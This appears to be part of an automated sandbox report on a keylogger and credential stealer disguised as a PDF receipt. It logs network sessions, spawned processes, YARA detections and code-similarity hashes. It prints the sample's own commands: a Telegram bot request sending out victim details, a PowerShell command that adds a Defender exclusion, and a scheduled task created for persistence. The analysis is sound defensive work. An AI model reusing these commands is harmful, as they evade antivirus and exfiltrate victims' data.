2025-01-16 06:02:15 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
17  192.168.2.4  49769  104.21.64.1  443  8008  C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp  Bytes transferred  Direction  Data
2025-01-16 06:02:16 UTC  61  OUT  GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-16 06:02:16 UTC  855  IN  HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:16 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322125
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BdEL6MQWEfmVnEs5n3WiA5QnpxCC%2B46ivIispnn1BKffqRoMd2oakFOhUvnSx8fjiECPjG9w8pK1KZdcmSYf8qvEXUchFvk20RwjAvcggaKH3XwN8WjSa5tvYeeEPHA3m%2FsGFPT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be54e48dbc358-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1500&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1893644&cwnd=155&unsent_bytes=0&cid=94ad9cb63f591ea6&ts=151&x=0"
2025-01-16 06:02:16 UTC  362  IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
18  192.168.2.4  49774  104.21.64.1  443  8008  C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp  Bytes transferred  Direction  Data
2025-01-16 06:02:17 UTC  85  OUT  GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-16 06:02:18 UTC  857  IN  HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:18 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322127
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ge3xx67m4HjgIYCxLIgYhXaXx4P2HnFuSt3aYHnqrAoa74YH%2B%2Bj8nziW%2BrSOyZlhPh3TrWXzG4cw85qJFPjflQJZ0fk64JHks6UYvBqtWPSfY8vrCGfM773%2FQaUKakCgP1cCxQdq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be55698e68ca1-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1929&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1428571&cwnd=168&unsent_bytes=0&cid=94d5991865ad046c&ts=157&x=0"
2025-01-16 06:02:18 UTC  362  IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
19  192.168.2.4  49775  149.154.167.220  443  8008  C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp  Bytes transferred  Direction  Data
2025-01-16 06:02:18 UTC  349  OUT  GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2012:17:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-16 06:02:19 UTC  344  IN  HTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:18 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 55
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-16 06:02:19 UTC  55  IN  Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:01:01:58
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                                                                                                                                                        Imagebase:0xd30000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"
                                                                                                                                                        Imagebase:0x4e0000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:4
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"
                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:5
                                                                                                                                                        Start time:01:02:00
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:01:02:01
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:01:02:02
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                        Imagebase:0x7ff693ab0000
                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:01:02:03
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        Imagebase:0xde0000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 26%, ReversingLabs
                                                                                                                                                        • Detection: 28%, Virustotal, Browse
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:01:02:04
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp"
                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:01:02:04
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:01:02:04
                                                                                                                                                        Start date:16/01/2025
                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\teXfNv.exe"
                                                                                                                                                        Imagebase:0x640000
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5 hash:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false


                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:3.1%
                                                                                                                                                          Total number of Nodes:196
                                                                                                                                                          Total number of Limit Nodes:8

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                                                                                          • API String ID: 0-1079488684

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -7v$-7v$RBtd$Tekq$Tekq
                                                                                                                                                          • API String ID: 0-406973083

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -7v$RBtd$Tekq$Tekq
                                                                                                                                                          • API String ID: 0-658814337

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 5{
                                                                                                                                                          • API String ID: 0-2291050889
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009
                                                                                                                                                          • Opcode ID: 19edee5114d7da133af366fa21e5cf017d1c7227cd0f33d7aac296065690176b
                                                                                                                                                          • Instruction ID: 5123bd973900d51e545c34df5886bd7ec9b9f1e1387d32fbdc096ec1d504bac7
                                                                                                                                                          • Opcode Fuzzy Hash: 19edee5114d7da133af366fa21e5cf017d1c7227cd0f33d7aac296065690176b
                                                                                                                                                          • Instruction Fuzzy Hash: 3E81E675D0520EEFCB48CFA6D98199EFBB2EF89314F10942AE416EB264D7349942CF10
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009
                                                                                                                                                          • Opcode ID: 1fc6f51a2672aabffaa73720f70b7ec55adc96377790fcb53dbee87572455506
                                                                                                                                                          • Instruction ID: 158349e729d0da261b4643875b01c0b12f77fa636889d120c6987aab6b89af85
                                                                                                                                                          • Opcode Fuzzy Hash: 1fc6f51a2672aabffaa73720f70b7ec55adc96377790fcb53dbee87572455506
                                                                                                                                                          • Instruction Fuzzy Hash: 8581E375D0521EEFCB48CFA6D98089EFBB2EF89314F10942AE416BB264D7349942CF54
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?H,a
                                                                                                                                                          • API String ID: 0-4093759987
                                                                                                                                                          • Opcode ID: 5f139ae3d8ad1af16f5529ca6f0384c99dcf22e8a8fbd390a7f86fb1afcc7fd3
                                                                                                                                                          • Instruction ID: e6b46ce1537ddb39efcba591ea90afd713aed6e502a5a80db3baa402f42851dd
                                                                                                                                                          • Opcode Fuzzy Hash: 5f139ae3d8ad1af16f5529ca6f0384c99dcf22e8a8fbd390a7f86fb1afcc7fd3
                                                                                                                                                          • Instruction Fuzzy Hash: A441F774E04209DFDB44CFA9C581A9EFBF2FF89200F24D5AAD415EB264D7349A41CB45
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 920c8ccd1f19ce5ebbb910276ab4d3e060eedb43961b039ad251f46d134c592f
                                                                                                                                                          • Instruction ID: ace9a6979a4865684c4fab0cdddf15974eff1ea879db3109921620813d6035e9
                                                                                                                                                          • Opcode Fuzzy Hash: 920c8ccd1f19ce5ebbb910276ab4d3e060eedb43961b039ad251f46d134c592f
                                                                                                                                                          • Instruction Fuzzy Hash: 9FC17A74E00218CFCF14CFA5D88079ABBB2BF88311F14C5AAD859AB255DB31A985CF91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 236fd4063fb2363aa5f62fbcdaf327f721d160819c0808ecefebffc9650a5b98
                                                                                                                                                          • Instruction ID: fa8f4794b8be04bde21392bc3a66c124bf834972140fa68441acc8542c4b49b5
                                                                                                                                                          • Opcode Fuzzy Hash: 236fd4063fb2363aa5f62fbcdaf327f721d160819c0808ecefebffc9650a5b98
                                                                                                                                                          • Instruction Fuzzy Hash: 95A1A274E01219DFCB54DFA9D984A9EBBF2FF88300F10856AD819AB364DB349945CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 31a3ec122ba34853c6bfc008cff44f25441c3c85bd7b3efdc6def8bfa3a57f1b
                                                                                                                                                          • Instruction ID: 6ca643aea6ef3cc6e55fb3c9b77e8cef5907d10845e6045b9987554ea2ba7dc3
                                                                                                                                                          • Opcode Fuzzy Hash: 31a3ec122ba34853c6bfc008cff44f25441c3c85bd7b3efdc6def8bfa3a57f1b
                                                                                                                                                          • Instruction Fuzzy Hash: B9613671D452289FDB64CF66CC407EEBBB6BF8A300F14C5AAC908B6250EB705A85CF40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 90baf440f8f662cce5bb885c4c30d40289a8460b2ef5266be3d0a0fd520c334c
                                                                                                                                                          • Instruction ID: 78312528155af6ab8761fbd38602e704dcae0668fc8029077001ec6d4b5ce6dd
                                                                                                                                                          • Opcode Fuzzy Hash: 90baf440f8f662cce5bb885c4c30d40289a8460b2ef5266be3d0a0fd520c334c
                                                                                                                                                          • Instruction Fuzzy Hash: 1D51E7B4E0520A9FCB08CFA5D5864AEFBB2FF89211F14942AD426E7364D7389A058F54
                                                                                                                                                          Memory Dump Source
